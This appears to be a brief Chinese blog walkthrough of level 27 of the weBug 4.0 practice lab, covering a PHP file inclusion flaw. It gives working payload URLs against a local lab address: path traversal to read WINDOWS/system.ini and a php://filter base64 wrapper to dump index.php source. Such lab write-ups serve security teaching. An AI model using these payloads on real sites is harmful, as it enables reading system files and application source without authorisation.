weBug 4.0 第27关 文件包含漏洞
2019-04-11 本文已影响0人
gelinlang
可以看到url如下,明显的文件包含,直接读取文件。
http://192.168.43.147/control/more/file_include.php?filename=../../template/dom_xss.html
直接payload,写这么多../是为了到达c盘根目录。
http://192.168.43.147/control/more/file_include.php?filename=../../../../../../WINDOWS/system.ini
还可以用php伪协议读取文件源码,比如WWW目录下的index.php
http://192.168.43.147/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php
将得到base64字符串,解码得到index.php源码